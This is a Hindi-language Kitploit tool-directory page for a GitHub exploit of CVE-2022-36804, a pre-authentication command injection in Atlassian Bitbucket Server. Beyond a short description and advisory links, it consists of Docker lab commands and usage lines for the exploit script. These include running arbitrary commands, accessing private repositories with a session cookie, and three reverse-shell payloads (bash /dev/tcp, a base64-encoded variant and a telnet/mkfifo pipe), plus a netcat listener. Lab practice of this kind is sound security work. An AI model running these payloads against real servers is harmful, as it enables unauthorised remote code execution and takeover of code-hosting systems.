Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-36804 — अटलासियन बिटबकेट सर्वर और डेटा सेंटर के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन भेद्यता पाई गई। यह भेद्यता बिटबकेट सर्वर और डेटा सेंटर के संस्करण <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 और <8.3.1 से पहले जारी सभी संस्करणों को प्रभावित करती है | Kitploit
उपकरण/GitHubGitHub/walnutsecurity/cve-2022-36804
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललैब और अभ्यास
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

अटलासियन बिटबकेट सर्वर और डेटा सेंटर के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन भेद्यता पाई गई। यह भेद्यता बिटबकेट सर्वर और डेटा सेंटर के संस्करण <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 और <8.3.1 से पहले जारी सभी संस्करणों को प्रभावित करती है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
843 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-36804: Atlassian Bitbucket Server में Pre-Auth RCE

Atlassian Bit bucket Server और Data center के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन भेद्यता पाई गई। यह भेद्यता Bitbucket Server और Data Center के उन सभी संस्करणों को प्रभावित करती है जो <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> और <8.3.1 से पहले जारी किए गए थे।

CVE-2022-36804 के लिए लैब

Docker बनाएँ

root@kitploit:~
docker build -t bitbucket .

Docker चलाएँ

root@kitploit:~
docker run -it bitbucket

cve-2022-36804.py का उपयोग

रिमोट कोड एक्ज़ीक्यूशन (RCE) की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

अनुकूलित कमांड (cmd) के साथ RCE की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

अनुकूलित कमांड, प्रोजेक्ट कुंजी और रिपॉज़िटरी नाम के साथ RCE की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

निजी रिपॉज़िटरी की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

netcat के साथ शेल प्राप्त करें

172.17.0.3 को अपने स्थानीय IP पते से बदलें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

netcat लिसनर इस प्रकार शुरू करें:

root@kitploit:~
nc -lvp 4444

पेलोड एक्ज़ीक्यूशन त्रुटि की स्थिति में /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 को base64 में बदलें।

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

यदि आपको अभी भी कोई त्रुटि आ रही है, तो नीचे दिया गया कमांड चलाएँ:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

अभ्यास के लिए Windows/Linux मशीन में Bitbucket सर्वर का कमज़ोर संस्करण स्थापित करने की अनुशंसा की जाती है। Docker इमेज की तुलना में रिवर्स शेल प्राप्त करना आसान होगा।

अधिक जानकारी यहाँ पाई जा सकती है।

संदर्भ

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
टूल डाउनलोड करें